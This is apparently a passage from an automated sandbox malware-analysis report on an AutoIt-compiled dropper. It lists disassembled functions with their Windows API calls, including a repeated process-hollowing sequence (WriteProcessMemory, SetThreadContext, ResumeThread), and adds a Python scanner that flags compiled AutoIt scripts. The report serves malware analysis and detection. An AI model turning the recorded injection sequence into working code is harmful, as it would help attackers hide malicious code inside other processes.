                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 98802146-2727554177
                                              • Opcode ID: 6f8d8de67be636600e26846fffcf96a178c53d31a57a4dc81569b8e2ebfc7d12
                                              • Instruction ID: 36439240c08dad91fb2bcffec5494be458b40d4eca8d30c827ceba807efd5844
                                              • Opcode Fuzzy Hash: 6f8d8de67be636600e26846fffcf96a178c53d31a57a4dc81569b8e2ebfc7d12
                                              • Instruction Fuzzy Hash: C3718B71105304AEC300EF69D891DAABBF8FF99380B40142EF649A71B1EB719A49DB52

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00E83465
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00E83474
                                              • LoadIconW.USER32(00000063), ref: 00E8348A
                                              • LoadIconW.USER32(000000A4), ref: 00E8349C
                                              • LoadIconW.USER32(000000A2), ref: 00E834AE
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E834C6
                                              • RegisterClassExW.USER32(?), ref: 00E83517
                                                • Part of subcall function 00E835AB: GetSysColorBrush.USER32(0000000F), ref: 00E835DE
                                                • Part of subcall function 00E835AB: RegisterClassExW.USER32(00000030), ref: 00E83608
                                                • Part of subcall function 00E835AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E83619
                                                • Part of subcall function 00E835AB: InitCommonControlsEx.COMCTL32(?), ref: 00E83636
                                                • Part of subcall function 00E835AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E83646
                                                • Part of subcall function 00E835AB: LoadIconW.USER32(000000A9), ref: 00E8365C
                                                • Part of subcall function 00E835AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E8366B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 423443420-4155596026
                                              • Opcode ID: 60b99cb28714307fde0016433b1e089e49e45c64903e0ee36cf9fd4d173f3042
                                              • Instruction ID: ae86b9a90ddafd4ec2c1ca67ef6c22ce52d7260381eeb49735fafbf8b116c8c8
                                              • Opcode Fuzzy Hash: 60b99cb28714307fde0016433b1e089e49e45c64903e0ee36cf9fd4d173f3042
                                              • Instruction Fuzzy Hash: 3F215B70E0031CABDB509FA5EC55BAABFB4FB49B51F00411AF608A62A0D3B94545EF90

                                              Control-flow Graph

• Graph: entry block 00E83AA3; basic blocks 00E83AA3-00E83E10 and 00EC4139-00EC4580; API calls inside the graph: SetCurrentDirectoryW (two call sites) (node/edge list from the interactive graph viewer not reproduced)
                                              APIs
                                                • Part of subcall function 00E87953: CloseHandle.KERNELBASE(?,?,00000000,00EC3A1C), ref: 00E87973
                                                • Part of subcall function 00E86E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00E83B33,?,00008000), ref: 00E86E80
                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00E83C17
                                              • _wcslen.LIBCMT ref: 00E83C96
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00E83D81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                              • API String ID: 3350465876-3738523708
                                              • Opcode ID: 9af33134525d13e319acbd59b6cb94a2de663c18ed15085baae4a9d49ed403af
                                              • Instruction ID: 0f19dcba2c24c977d076b4adbbc0d86c6d41ad052696cf7e1b8f651aafe37fc7
                                              • Opcode Fuzzy Hash: 9af33134525d13e319acbd59b6cb94a2de663c18ed15085baae4a9d49ed403af
                                              • Instruction Fuzzy Hash: F122BC701083409FC714EF24C891AAFBBE5BF99314F14291DF58DA72A2DB71EA49CB52
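The string list of this routine carries "AU3!" and "EA06" next to the script-loading error messages ("Error opening the file", "#include depth exceeded ..."): these two literals form the header tag "AU3!EA06" of a compiled AutoIt v3 script, which is what the runtime looks for when it loads the embedded payload. Together with the "AutoIt v3 GUI" window class and the Software\AutoIt v3\AutoIt registry path seen in the other listings above, they give a cheap static triage check for "is this an AutoIt-compiled dropper, and does it carry a script worth extracting?". The following scanner is an added example written for this page; it is not code from the report or from the AutoIt project. It assumes the tag is stored contiguously as ASCII "AU3!EA06" (as in compiled AutoIt binaries), that the wide strings handed to the *W APIs are stored as UTF-16LE literals (it searches ASCII too), and that the "two or more runtime strings" threshold is a heuristic chosen here, not a rule from the report.

```python
"""Static triage: does a file embed the AutoIt v3 runtime and a compiled script?

Added example. Offsets are byte offsets into the file image, not RVAs.
"""
import re
import sys

# Header tag of a compiled AutoIt v3 script blob (ASCII, contiguous).
SCRIPT_MAGIC = b"AU3!EA06"

# Strings the runtime passes to *W APIs in this report. They are searched both
# as ASCII and as UTF-16LE, since the W APIs imply wide-string literals.
RUNTIME_STRINGS = {
    "window_class": "AutoIt v3 GUI",
    "registry_key": "Software\\AutoIt v3\\AutoIt",
    "include_error": "#include depth exceeded",
}


def _encodings(text):
    """Both byte encodings a literal may have in the binary."""
    return [text.encode("ascii"), text.encode("utf-16-le")]


def scan_bytes(data):
    """Return which markers were found, where, and a verdict for each question."""
    found = {}
    for name, text in RUNTIME_STRINGS.items():
        for needle in _encodings(text):
            off = data.find(needle)
            if off != -1:
                found[name] = off
                break
    magic_offsets = [m.start() for m in re.finditer(re.escape(SCRIPT_MAGIC), data)]
    return {
        "runtime_strings": found,
        "script_magic_offsets": magic_offsets,
        # Heuristic threshold (assumption): two independent runtime strings is a
        # strong hint of the AutoIt3 interpreter; a single hit can be a decoy.
        "autoit_runtime": len(found) >= 2,
        # The header tag means there is a compiled payload to carve and decompile.
        "compiled_script": bool(magic_offsets),
    }


def build_sample():
    """Constructed sample for offline use: filler bytes with the markers embedded."""
    blob = bytearray(b"MZ" + b"\x00" * 254)                       # 256 bytes of stub
    blob += "AutoIt v3 GUI".encode("utf-16-le") + b"\x00\x00"        # at offset 256
    blob += b"\x90" * 64
    blob += "Software\\AutoIt v3\\AutoIt".encode("utf-16-le") + b"\x00\x00"  # at 348
    blob += b"\xcc" * 32
    blob += SCRIPT_MAGIC + b"\x00" * 16                              # at 432
    return bytes(blob)


if __name__ == "__main__":
    # Usage: python autoit_triage.py <file>; without an argument it scans the sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(scan_bytes(data))
```

A hit on `compiled_script` tells you where to start carving the script resource for decompilation; a hit on `autoit_runtime` without the tag is typical of a legitimate AutoIt3 interpreter or of a packed sample whose script is only present after unpacking, so treat the two verdicts separately.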

                                              Control-flow Graph

• Graph: entry block 00E83696; basic blocks 00E83696-00E837A4 and 00EC3D6F-00EC3E55; API calls inside the graph: DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, KillTimer, CreatePopupMenu, MoveWindow, SetFocus (node/edge list from the interactive graph viewer not reproduced)
                                              APIs
                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00E83690,?,?), ref: 00E836FE
                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,00E83690,?,?), ref: 00E8372A
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E8374D
                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00E83690,?,?), ref: 00E83758
                                              • CreatePopupMenu.USER32 ref: 00E8376C
                                              • PostQuitMessage.USER32(00000000), ref: 00E8378D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                              • String ID: TaskbarCreated
                                              • API String ID: 129472671-2362178303
                                              • Opcode ID: a155cba6a3600b29be3a88c080abb4782dad7887cf1eb0bef3e1a4d3abe26332
                                              • Instruction ID: f6e59c70b82ab04a4de4453d8cd6c0c18cd04c1032cd48a5e2559a0ebedcff20
                                              • Opcode Fuzzy Hash: a155cba6a3600b29be3a88c080abb4782dad7887cf1eb0bef3e1a4d3abe26332
                                              • Instruction Fuzzy Hash: EE416DB51042487BDB147B38CC09BBA3A65E702715F00722AF60EB62E1DA77DB41B711

                                              Control-flow Graph

• Graph: entry block 00E82A52; basic blocks 00E82A52-00E82D5C and 00EC39F4-00EC3BB3; API calls inside the graph: DestroyWindow, mciSendStringW, UnregisterHotKey, FindClose, FreeLibrary, VirtualFree, CoUninitialize (node/edge list from the interactive graph viewer not reproduced)
                                              APIs
                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E82A9B
                                              • CoUninitialize.COMBASE ref: 00E82B3A
                                              • UnregisterHotKey.USER32(?), ref: 00E82D1F
                                              • DestroyWindow.USER32(?), ref: 00EC39F5
                                              • FreeLibrary.KERNEL32(?), ref: 00EC3A5A
                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EC3A87
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                              • String ID: close all
                                              • API String ID: 469580280-3243417748
                                              • Opcode ID: 192b55790258fae8e155ed80688fe40e82be3fbde9300dca45f889cbedd5ffab
                                              • Instruction ID: 70f8f1a7a1b843444a6cedf2232bc9ab5d0bb1a4bac04d4cd61904391e8b73d3
                                              • Opcode Fuzzy Hash: 192b55790258fae8e155ed80688fe40e82be3fbde9300dca45f889cbedd5ffab
                                              • Instruction Fuzzy Hash: EBD138317012129FCB29EF25C595BA9F7A0BF15704F15A29DE94E7B252CB32AD22CF40

                                              Control-flow Graph
                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EF8907
                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 00EF891B
                                              • GetFileAttributesW.KERNEL32(?), ref: 00EF8945
                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00EF895F
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF8971
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF89BA
                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00EF8A0A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$AttributesFile
                                              • String ID: *.*
                                              • API String ID: 769691225-438819550
                                              • Opcode ID: dfd9364f2f852618d0e4c0b639be678a98b61c498021a8e8e393b8923384f0e3
                                              • Instruction ID: 8c20d04c6c02d215f0ffc03957ea2fd4c1227069bfe9ba1d2fec74d0b28b987c
                                              • Opcode Fuzzy Hash: dfd9364f2f852618d0e4c0b639be678a98b61c498021a8e8e393b8923384f0e3
                                              • Instruction Fuzzy Hash: C481F3725043489FCB24EF14C540ABEB3E8BF85354F94A81EF689E7250EB74D944CB92

                                              Control-flow Graph
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 343912bdcdb605933a1dc297220f446a304ba6a6180d7bfd29e58491eb337dbd
                                              • Instruction ID: 14fe169f825e79c1a4f6c93bc8171c6bf9aa49d312665564d8d864e0bb4513f1
                                              • Opcode Fuzzy Hash: 343912bdcdb605933a1dc297220f446a304ba6a6180d7bfd29e58491eb337dbd
                                              • Instruction Fuzzy Hash: 18C1C370A04249AFDB11DFE8D881BEEBBF4AF49304F145199EA24BB393C7349941CB61
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E83568
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E83589
                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E832EF,?), ref: 00E8359D
                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E832EF,?), ref: 00E835A6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: 0fd9f768dac7fde873a5e587fc7a9f42c3b0cdde62c5a8ffed37e87c1a164354
                                              • Instruction ID: 3b706ddb0be33de32c0db37625492fe8eb0d83049f21862efad5e484579c0ed0
                                              • Opcode Fuzzy Hash: 0fd9f768dac7fde873a5e587fc7a9f42c3b0cdde62c5a8ffed37e87c1a164354
                                              • Instruction Fuzzy Hash: 0EF017716403987AE76147136C08E773FBDD7C7F11B02011EBA04A61A0C26A0881FAB0
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,00000002,0000003A), ref: 012AAE35
                                              • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAE8D
                                              • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAED9
                                              • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 012AAF24
                                              • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 012AAF44
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 012A8000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: Thread$ContextMemoryProcessWow64Write$Resume
                                              • String ID:
                                              • API String ID: 507195048-0
                                              • Opcode ID: c66fbaef652902583260d1b2d1f461e2e828baad6f6a4d71afdc61a68c8ea94d
                                              • Instruction ID: 29fcee869cfc67ffdb2ae8286515d9b6d841d539e415ecec56943e6e72fd1dc8
                                              • Opcode Fuzzy Hash: c66fbaef652902583260d1b2d1f461e2e828baad6f6a4d71afdc61a68c8ea94d
                                              • Instruction Fuzzy Hash: 7D5133B06902037FEA29BBB0CC46F3937199FA6704F644198B61D9F2D1CA73B811C766
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,00000002,0000003A), ref: 012AAE35
                                              • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAE8D
                                              • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAED9
                                              • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 012AAF24
                                              • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 012AAF44
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 0121A000, based on PE: false
                                              • Associated: 00000008.00000003.2303528910.000000000121A000.00000004.00000020.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: Thread$ContextMemoryProcessWow64Write$Resume
                                              • String ID:
                                              • API String ID: 507195048-0
                                              • Opcode ID: e7ab9b8b68b257566efdf12b6e5227a1d815c31da4e399672c2ac30f7a52377f
                                              • Instruction ID: 29fcee869cfc67ffdb2ae8286515d9b6d841d539e415ecec56943e6e72fd1dc8
                                              • Opcode Fuzzy Hash: e7ab9b8b68b257566efdf12b6e5227a1d815c31da4e399672c2ac30f7a52377f
                                              • Instruction Fuzzy Hash: 7D5133B06902037FEA29BBB0CC46F3937199FA6704F644198B61D9F2D1CA73B811C766
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,00000002,0000003A), ref: 012AAE35
                                              • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAE8D
                                              • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAED9
                                              • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 012AAF24
                                              • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 012AAF44
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 012A9000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: Thread$ContextMemoryProcessWow64Write$Resume
                                              • String ID:
                                              • API String ID: 507195048-0
                                              • Opcode ID: c66fbaef652902583260d1b2d1f461e2e828baad6f6a4d71afdc61a68c8ea94d
                                              • Instruction ID: 29fcee869cfc67ffdb2ae8286515d9b6d841d539e415ecec56943e6e72fd1dc8
                                              • Opcode Fuzzy Hash: c66fbaef652902583260d1b2d1f461e2e828baad6f6a4d71afdc61a68c8ea94d
                                              • Instruction Fuzzy Hash: 7D5133B06902037FEA29BBB0CC46F3937199FA6704F644198B61D9F2D1CA73B811C766
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,00000002,0000003A), ref: 012AAE35
                                              • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAE8D
                                              • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,00000002,0000003A), ref: 012AAED9
                                              • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 012AAF24
                                              • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 012AAF44
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                              • Associated: 00000008.00000003.2303528910.000000000121A000.00000004.00000020.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: Thread$ContextMemoryProcessWow64Write$Resume
                                              • String ID:
                                              • API String ID: 507195048-0
                                              • Opcode ID: e7ab9b8b68b257566efdf12b6e5227a1d815c31da4e399672c2ac30f7a52377f
                                              • Instruction ID: 29fcee869cfc67ffdb2ae8286515d9b6d841d539e415ecec56943e6e72fd1dc8
                                              • Opcode Fuzzy Hash: e7ab9b8b68b257566efdf12b6e5227a1d815c31da4e399672c2ac30f7a52377f
                                              • Instruction Fuzzy Hash: 7D5133B06902037FEA29BBB0CC46F3937199FA6704F644198B61D9F2D1CA73B811C766
                                              APIs
                                              • GetLastError.KERNEL32(0000000A,?,?,00EAF66E,00EA547F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00EB318D
                                              • _free.LIBCMT ref: 00EB31C2
                                              • _free.LIBCMT ref: 00EB31E9
                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00EB31F6
                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00EB31FF
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              • API String ID: 3170660625-0
                                              • Opcode ID: 5390cff0c3fd2044f038ee2c03eb6e0e90583b361f40463d0e54ffd158e019b5
                                              • Instruction ID: e33c6387562701cbe97f8803336530c9e0acfef25f94ad8e7d5bc54a49d97fe1
                                              • Opcode Fuzzy Hash: 5390cff0c3fd2044f038ee2c03eb6e0e90583b361f40463d0e54ffd158e019b5
                                              • Instruction Fuzzy Hash: 8301783A303A1537D212233C5C4BDEB32AEAFC5375F212428F925F2191EE20CE022020
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E855EB,SwapMouseButtons,00000004,?), ref: 00E8561C
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E855EB,SwapMouseButtons,00000004,?), ref: 00E8563D
                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00E855EB,SwapMouseButtons,00000004,?), ref: 00E8565F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: 05d4189d37399ec2638d2ad900412f846ad6395af1d7f0a9477540e5920bfcda
                                              • Instruction ID: a24a63762b7bddf8df2018b8dc999da7022fe3b4292bb5cca21b9107f192a565
                                              • Opcode Fuzzy Hash: 05d4189d37399ec2638d2ad900412f846ad6395af1d7f0a9477540e5920bfcda
                                              • Instruction Fuzzy Hash: 4B117CB2610608BFDB209FA4CC40DEF7BBCEF04744F409569F809E7120EA719E40A760
                                              APIs
                                              • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00EDE73D
                                              • FreeLibrary.KERNEL32 ref: 00EDE763
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: AddressFreeLibraryProc
                                              • String ID: GetSystemWow64DirectoryW$X64
                                              • API String ID: 3013587201-2590602151
